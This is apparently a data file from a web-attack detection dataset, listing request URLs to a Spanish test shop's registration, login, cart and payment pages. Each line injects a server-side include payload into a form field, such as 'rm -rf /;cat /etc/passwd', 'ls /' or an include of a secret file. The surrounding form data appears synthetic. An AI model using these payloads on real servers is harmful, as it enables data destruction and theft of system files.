/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=39&cantidad=80&B1=A%F1adir+al+carrito%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=babatund&password=pA6OMer9-A%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&nombre=Juana+del+Pilar&apellidos=Luna+Barberan&email=mazurowna%40wdsl.om&dni=19546963E&direccion=Villadangos+Del+Paramo%2C+82%2C+&ciudad=Encinas+de+Esgueva&cp=10830&provincia=Alicante&ntc=5365738910346806&B1=Registrar
/tienda1/publico/pagar.jsp?modo=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=6471&B1=Pasar+por+caja
/tienda1/publico/anadir.jsp?id=2&nombre=Vino+Rioja&precio=85&cantidad=83&B1=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/registro.jsp?modo=registro%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&login=surreau&password=2u1nt1&nombre=Najla&apellidos=Matamalas+Reixachs&email=egger.nardo%40quecole.sr&dni=56569418K&direccion=Pl.+Tres+Olivos%2C+S%2FN+1-F&ciudad=Ll%EDber&cp=26321&provincia=Guadalajara&ntc=5185081374868942&B1=Registrar
/tienda1/publico/registro.jsp?modo=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&login=cowley&password=B1JEd7AD&nombre=Werner&apellidos=Santiago+Espejel&email=okeefe.gilger0%40ajuntamentdebarcelona2-0.in&dni=87784817G&direccion=Carretera+Del+Carmel+99+&ciudad=Ribafrecha&cp=40331&provincia=A+Coru%F1a&ntc=3867909567368782&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=yansun&pwd=03s6ig89%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&remember=on&B1=Entrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&pwd=1Ece57aL&remember=off&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=yingcdi&password=pisa-verde&nombre=Vianella&apellidos=Galdeano+Piccech&email=dudgeon%40tradora.na&dni=80818838N&direccion=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ciudad=Gormaz&cp=32737&provincia=Zaragoza&ntc=0673547824413217&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=reiser&password=fi33%F38841&nombre=Palmira&apellidos=Rocha+Pello&email=terry-lewis.macdougall%40ofertaschinas.gd&dni=46644989T%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&direccion=Calle+Los+Hotelitos+S%2FN%2C+&ciudad=Alforja&cp=06200&provincia=Madrid&ntc=6898289931368660&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=lemar&password=43lpe7de2o&nombre=Bianca&apellidos=Valor+Agudo&email=vallarine7%407horas.mo&dni=90125861Q&direccion=Plaza+Monasterio+De+La+Oliva%2C+S%2FN%2C+&ciudad=Tembleque&cp=20493&provincia=Navarra&ntc=7119531551958366&B1=Registrar%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/registro.jsp?modo=registro&login=reiser&password=fi33%F38841&nombre=Palmira&apellidos=Rocha+Pello&email=terry-lewis.macdougall%40ofertaschinas.gd&dni=46644989T&direccion=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&ciudad=Alforja&cp=06200&provincia=Madrid&ntc=6898289931368660&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=yukihiko&password=10nfig318c559&nombre=Malias&apellidos=Monestel+Robaldino&email=nagy%40973.lv&dni=61037738Q&direccion=C%2F+Begonia+49+12F&ciudad=Borges+del+Camp%2C+Les&cp=37621&provincia=Guadalajara&ntc=1924133576102581&B1=Registrar%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/anadir.jsp?id=3&nombre=Vino+Rioja&precio=39%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cantidad=3&B1=A%F1adir+al+carrito
/tienda1/publico/registro.jsp?modo=registro&login=anurag&password=am60A4i7o&nombre=Custodio&apellidos=Amazarray+Gersol&email=martell%40923.pe&dni=15138092K&direccion=Sant+Josep%2C+93%2C+&ciudad=Castellar+del+Vall%E8s&cp=03813&provincia=Soria%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&ntc=2906865498291139&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&password=10nfig318c559&nombre=Malias&apellidos=Monestel+Robaldino&email=nagy%40973.lv&dni=61037738Q&direccion=C%2F+Begonia+49+12F&ciudad=Borges+del+Camp%2C+Les&cp=37621&provincia=Guadalajara&ntc=1924133576102581&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=1202%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Pasar+por+caja
/tienda1/publico/autenticar.jsp?modo=entrar&login=hironaga&pwd=130c%E9&remember=on&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/pagar.jsp?modo=insertar&precio=4236&B1=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=85&cantidad=31&B1=A%F1adir+al+carrito%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/registro.jsp?modo=registro&login=nicolo&password=corconera&nombre=Pastora&apellidos=Cruillas&email=damboise%40automovilesalhambra.co&dni=59569586T&direccion=Iru%F1a+43%2C+&ciudad=Cervera+del+Llano&cp=18614&provincia=Santa+Cruz+de+Tenerife&ntc=6204495616575478&B1=Registrar%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=dirienzo&password=HacEdOr&nombre=Geraldo&apellidos=Turra+Clop%E9s&email=fang_lavanant%40infotek.gu&dni=39243664Y&direccion=Calle+Tres+Marias%2C+103+&ciudad=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cp=28980&provincia=Zaragoza&ntc=7982155754096924&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=6771&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/registro.jsp?modo=registro&login=goldarin5%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&password=peRVeRtiR&nombre=Lavinia&apellidos=Llecha&email=stalmaster%40fotoseroticas.com.edu&dni=50951157Q&direccion=Calle+Nancales%2C+S%2FN%2C+&ciudad=Urdazubi%2FUrdax&cp=24879&provincia=A+Coru%F1a&ntc=1870284741408418&B1=Registrar
/tienda1/publico/anadir.jsp?id=1&nombre=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&precio=85&cantidad=77&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=absi&password=PrIMogEnitURa%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&nombre=Sem&apellidos=Bettini&email=phillott%40g-audio.cf&dni=88374981B&direccion=Calle+Zubia+7+&ciudad=Gar%EDnoain&cp=10189&provincia=Lleida&ntc=0957957573117060&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&pwd=%2Bad7quie7&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=stefanac&password=autointoxicaci%F3n&nombre=Eudoro&apellidos=Valderr%E1bano&email=marleau%40rosaserigrafia.nz&dni=08475533X&direccion=Pl.+Elio+Antonio+De+Nebrija%2C+34+&ciudad=Santa+Mar%EDa+del+Cubillo&cp=43740&provincia=Guadalajara&ntc=3535089372971785&B1=Registrar%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=fallah&password=sindicable&nombre=Fabia&apellidos=Rom%E0+Subir%F3n&email=segar%40contactomujeres.nc&dni=64964263G&direccion=Ortiz+De+Zarate+32%2C+&ciudad=Petrer&cp=49331&provincia=Badajoz&ntc=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&precio=9874&B1=Confirmar
/tienda1/miembros/editar.jsp?modo=registro&login=luelle&password=calahorra%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&nombre=Adoraci%F3n&apellidos=Ridao+Aloy&email=buckley9%40faders.com.ai&dni=77983575M&direccion=Cecilia+Riera+118+13G&ciudad=Galilea&cp=44358&provincia=Guadalajara&ntc=0093197595343977&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=wolfie8&pwd=antagallar&remember=off&B1=Entrar%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=401%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=Pasar+por+caja
/tienda1/miembros/editar.jsp?modo=registro&login=fabris&password=dEsEnquieTar&nombre=Epifanio&apellidos=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&email=denny%40ajuntamentbarcelona2-0.us&dni=41585257S&direccion=Corva+198+12%3FH&ciudad=Bovera&cp=09259&provincia=%C1vila&ntc=3393065901752374&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=6858&B1=Confirmar
/tienda1/miembros/editar.jsp?modo=registro&login=vrouwerf&password=ADeMa*DOR&nombre=Teodocio&apellidos=Feixas+Sarri%E0&email=vonderlinn%40coachingevolutivo.mq&dni=99068389Y&direccion=Calle+Cerrillo+Del+Hambre%2C+130+5%3FD&ciudad=Tob%EDa%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cp=50213&provincia=C%F3rdoba&ntc=4869029822529267&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=crommie&pwd=0eju0o&remember=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&B1=Entrar
/tienda1/publico/vaciar.jsp?B2=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=85&cantidad=76%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=6276%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=Confirmar
/tienda1/publico/anadir.jsp?id=1&nombre=Jam%F3n+Ib%E9rico&precio=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&cantidad=71&B1=A%F1adir+al+carrito
/tienda1/publico/autenticar.jsp?modo=entrar&login=ornelas&pwd=frail%EDa&remember=on&B1=Entrar%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=1881%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Pasar+por+caja
/tienda1/publico/anadir.jsp?id=1&nombre=Queso+Manchego&precio=85&cantidad=24&B1=A%F1adir+al+carrito%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/autenticar.jsp?modo=entrar&login=beate&pwd=esp8rtillero%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&remember=off&B1=Entrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&pwd=COnSO0atiVO&remember=on&B1=Entrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=8496&B1=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/anadir.jsp?id=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&nombre=Jam%F3n+Ib%E9rico&precio=100&cantidad=48&B1=A%F1adir+al+carrito
/tienda1/publico/registro.jsp?modo=registro&login=torrin&password=villero&nombre=Amandio&apellidos=Rusi%F1ol+Camps&email=carton-haake%40palodegolf.com.af&dni=37712313H&direccion=Passeig+Sant+Joan+Bosco+22%2C+12%3FG&ciudad=Santa+Coloma+de+Cervell%F3&cp=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&provincia=%C1lava&ntc=1134011255413195&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=marquez6&password=SIsallo%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&nombre=Magali&apellidos=Mojeda+Batet&email=laing%40rocofer.pe&dni=16093683P&direccion=Calle+Mosen+Damian+Borobia+38+10-F&ciudad=Puente+Viesgo&cp=48213&provincia=Albacete&ntc=3563768127894231&B1=Registrar
/tienda1/publico/pagar.jsp?modo=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=3086&B1=Pasar+por+caja
/tienda1/publico/autenticar.jsp?modo=entrar%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&login=abdullah&pwd=cOrcusIdO&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=mcdowall&password=7820ITuIr&nombre=Laurencio&apellidos=Irigoyen+Bombard%F3&email=rueda.unicorn%40tiposdedrogas.je&dni=92997163K&direccion=Avenida+San+Ignacio+De+Loyola+128+8%3FC&ciudad=Chillu%E9var&cp=05279&provincia=Barcelona&ntc=0602317509119469%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=gavens0&password=revirado&nombre=Kaya&apellidos=Mojeda+Batet&email=munshin%40cirugiaplasticacordoba.hk&dni=65532112Y&direccion=Plaza+Flauta+16%2C+1%3FB&ciudad=Valdeavellano+de+Tera&cp=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&provincia=Teruel&ntc=2452355001922764&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=kelli&password=resca%F1o&nombre=An%EDcar&apellidos=Bastus+Pellini&email=wiley%40pintandomucho.va&dni=65763257R&direccion=C%2F+Cases+Noves%2C+98%2C+&ciudad=Gomesende&cp=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&provincia=%C1vila&ntc=2592750778275929&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=charlesb&password=m96fan19&nombre=Durante&apellidos=Campusano+Caldero&email=gheorghiu-battaglia%40sanchezgordo.bt&dni=44335499D&direccion=C%2F+Padre+Luis+Maria+Arteche+0+5B&ciudad=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&cp=37716&provincia=Cantabria&ntc=6556979183874771&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=veen&password=sar*gent%EDa&nombre=Vigilio&apellidos=Mitjavila+Oca&email=seeck%40lawn.gu&dni=29573614F&direccion=Calle+Ripolles+83%2C+&ciudad=Valderr%E1bano&cp=16812&provincia=Valencia%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ntc=7619192104254644&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=izaak&password=calibraci%F3n&nombre=Hortencia&apellidos=Turet+Maiorana&email=hannon.white8%40mtos.st&dni=88648013X&direccion=C%2F+Ajuntament+S%2FN+&ciudad=Santa+Mar%EDa+del+Ti%E9tar&cp=50491&provincia=Ourense%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&ntc=6434125672280477&B1=Registrar
/tienda1/publico/anadir.jsp?id=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&nombre=Vino+Rioja&precio=39&cantidad=2&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=4981&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/autenticar.jsp?modo=entrar&login=gavens0&pwd=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&remember=on&B1=Entrar
/tienda1/publico/anadir.jsp?id=1&nombre=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=85&cantidad=22&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=Pasar+por+caja
/tienda1/publico/caracteristicas.jsp?id=2%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/miembros/editar.jsp?modo=registro&login=peers&password=at222a1&nombre=Cipriana&apellidos=Serradell&email=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&dni=19247264J&direccion=C%2F+Joventut%2C+182%2C+&ciudad=Alegia&cp=31510&provincia=Salamanca&ntc=8765134980053757&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=shoouyu&pwd=06434Q969o&remember=on%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=gustave&password=v3o8720a&nombre=Mar%EDa+Begonia&apellidos=Fain%E9+Motj%E9&email=dyne%40somosagelespa%F1a.us&dni=30663985V&direccion=Calle+Antonio+Gramsci+30%2C+12%3FB%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&ciudad=Narros+del+Puerto&cp=40183&provincia=Zamora&ntc=4102151120364510&B1=Registrar
/tienda1/publico/anadir.jsp?id=1&nombre=Jam%F3n+Ib%E9rico%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&precio=39&cantidad=81&B1=A%F1adir+al+carrito
/tienda1/publico/caracteristicas.jsp?id=2%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=88&B1=Confirmar%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=1510%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&B1=Confirmar
/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=39&cantidad=42%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=lachine&password=contrAamura&nombre=Nicasia&apellidos=Coyoma+Abia&email=padovani%40thequeenworm.mp&dni=78419891B&direccion=Avenida+Castilla-la+Mancha+187%2C+3-D&ciudad=Sagrada%2C+La&cp=09318&provincia=A+Coru%F1a%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ntc=4808153993761167&B1=Registrar
/tienda1/publico/pagar.jsp?modo=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&precio=346&B1=Confirmar
/tienda1/miembros/editar.jsp?modo=registro&login=yigal&password=anF6_9ti%D34915&nombre=Sharim&apellidos=Grino+Crosas&email=santacroce_prueckner%40puravidasa.bn&dni=68875056S&direccion=C%2F+Padre+Presentat%2C+26+&ciudad=Torremanzanas%2FTorre+de+les+Ma%E7anes%2C+la%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&cp=31750&provincia=%C1vila&ntc=7191364141648176&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=6071%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Confirmar
/tienda1/publico/registro.jsp?modo=registro&login=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&password=idealismo&nombre=Ian&apellidos=Sacota+Xech&email=alland.soeltoft%40aridossanchez.do&dni=28681618C&direccion=C%2F+Valencia+S%2FN+11A&ciudad=Pancorbo&cp=26321&provincia=Alicante&ntc=3366384544522158&B1=Registrar
/tienda1/publico/anadir.jsp?id=1&nombre=Jam%F3n+Ib%E9rico&precio=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cantidad=78&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&password=contrAamura&nombre=Nicasia&apellidos=Coyoma+Abia&email=padovani%40thequeenworm.mp&dni=78419891B&direccion=Avenida+Castilla-la+Mancha+187%2C+3-D&ciudad=Sagrada%2C+La&cp=09318&provincia=A+Coru%F1a&ntc=4808153993761167&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=draves&password=ro%F1IcA&nombre=Babeli&apellidos=Hermoso+Ginart&email=haver0%40iurispretor.cn&dni=77284339S&direccion=Calle+Urbina%2C+129+&ciudad=Berango%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&cp=33775&provincia=Le%F3n&ntc=7007903703917778&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&B1=Confirmar
/tienda1/publico/autenticar.jsp?modo=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&login=chetan&pwd=tontuela&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&login=tiong-ho&password=an1l5m9no&nombre=Hadasa&apellidos=Subias&email=parada.biuchet4%40aulahost.gw&dni=79845869N&direccion=Jacinto+Benavente%2C+165+7F&ciudad=Herreruela&cp=11330&provincia=Teruel&ntc=4461899477803914&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=charko&password=entrevenimiento&nombre=Cayetano&apellidos=Papiol+Garriga&email=ruehmann.goodrow%40cajucar.bz&dni=75246757A&direccion=C%2F+Sierra+Maigmo%2C+S%2FN%2C+1%3FD&ciudad=Villa+de+Ves&cp=09343&provincia=Guadalajara&ntc=1828745224462815&B1=Registrar%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/anadir.jsp?id=2&nombre=Vino+Rioja&precio=85%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&cantidad=60&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=klasky&password=TEM.%E1TiCO&nombre=Licia&apellidos=Maeso+Comello&email=verrell.myral%40cafedeteatro.kh&dni=33908887X&direccion=Plaza+Pedro+Marcos%2C+145+&ciudad=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&cp=36700&provincia=C%E1diz&ntc=4984450191632548&B1=Registrar
/tienda1/publico/anadir.jsp?id=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&nombre=Vino+Rioja&precio=85&cantidad=60&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=5562%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&B1=Pasar+por+caja
/tienda1/publico/registro.jsp?modo=registro%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&login=kanya&password=trasladadora&nombre=Angelo&apellidos=Goya+Asensio&email=bowers%40puntodevistafotografia.gf&dni=56007542N&direccion=C%2F+Baja+58%2C+1%3FH&ciudad=Helechosa+de+los+Montes&cp=10181&provincia=Valencia&ntc=8914897432837758&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=nataniel&password=53rD11c4&nombre=Ligia&apellidos=Klindt+Vanega&email=cordon4%40hojainformativas.je&dni=96785368B&direccion=Pintor+Clemente+De+Torres+169+&ciudad=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&cp=09125&provincia=Guadalajara&ntc=2447487443590870&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&login=swen&pwd=incisorio&remember=off&B1=Entrar
/tienda1/publico/anadir.jsp?id=1&nombre=Queso+Manchego&precio=39&cantidad=59&B1=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=nitin&password=r4mitir&nombre=Lionel&apellidos=Teixidor+Modrego&email=creach%40vindexexpo.gr&dni=37118814B&direccion=C%2F+Joaquin+Arjona+70%2C+&ciudad=Rionegro+del+Puente&cp=49639&provincia=Barcelona&ntc=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=krishna&pwd=3o%3F964I7A1&remember=on&B1=Entrar%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/miembros/editar.jsp?modo=registro&login=manek&password=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&nombre=Oberto&apellidos=Mansur+Morales&email=laval_koldehoff%40nutrimama.sb&dni=73525509Y&direccion=Alarona%2C+52+&ciudad=San+Garc%EDa+de+Ingelmos&cp=26375&provincia=Soria&ntc=8551810827750150&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&login=niccolo&pwd=astrac%E1n&remember=on&B1=Entrar
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego&precio=39&cantidad=86&B1=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/autenticar.jsp?modo=entrar&login=cristi%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&pwd=corac27o&remember=on&B1=Entrar
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego&precio=100&cantidad=6&B1=A%F1adir+al+carrito%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E
/tienda1/publico/registro.jsp?modo=registro&login=kapil&password=d1c36o4ca&nombre=Berina+del+Valle&apellidos=Artico&email=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&dni=17826694S&direccion=C%2F+Historiador+Rodrigo+Pertegas%2C+149%2C+8-E&ciudad=Palafolls&cp=25218&provincia=C%E1ceres&ntc=3256313581077416&B1=Registrar
/tienda1/publico/anadir.jsp?id=1&nombre=Queso+Manchego&precio=39%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&cantidad=94&B1=A%F1adir+al+carrito
/tienda1/publico/registro.jsp?modo=registro&login=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&password=e8c5mulg055r&nombre=Sindulfo&apellidos=Labastie+Princep&email=beckley.sone%40sayuela.ge&dni=96517735Y&direccion=Carrer+Marges+174+9B&ciudad=Villanueva+del+Trabuco&cp=05152&provincia=Tarragona&ntc=1337485764739687&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=nill&password=2739n83d%2446&nombre=Yael&apellidos=Paladell+Perramon&email=brandauer%40barnicesuv.td&dni=31914466B&direccion=Calle+Corpo+Santo%2C+11+6G&ciudad=Canales+de+la+Sierra&cp=22220&provincia=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ntc=3350910813018179&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=morton6&password=a5to4iro&nombre=Ari&apellidos=Pejoan+Ang%F3s&email=rosenthal%40tintasultravioleta.pm&dni=97428883D&direccion=Damian+De+Castro%2C+52%2C+&ciudad=Godojos&cp=43420&provincia=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&ntc=5864494451512907&B1=Registrar
/tienda1/publico/anadir.jsp?id=2&nombre=Vino+Rioja%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&precio=85&cantidad=90&B1=A%F1adir+al+carrito
/tienda1/publico/autenticar.jsp?modo=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&login=darb2&pwd=h4_Bi651A2&remember=on&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=arne&password=AREnillA&nombre=Malaqu%EDas&apellidos=Bota+Gifre&email=herdegen-vehil%40cortinas-de-aire.ar&dni=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&direccion=C%2F+Sabugo%2C+157%2C+&ciudad=Valdevacas+de+Montejo&cp=26339&provincia=Tarragona&ntc=6852146150685245&B1=Registrar
/tienda1/publico/anadir.jsp?id=1&nombre=Vino+Rioja&precio=85&cantidad=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=4179&B1=Confirmar
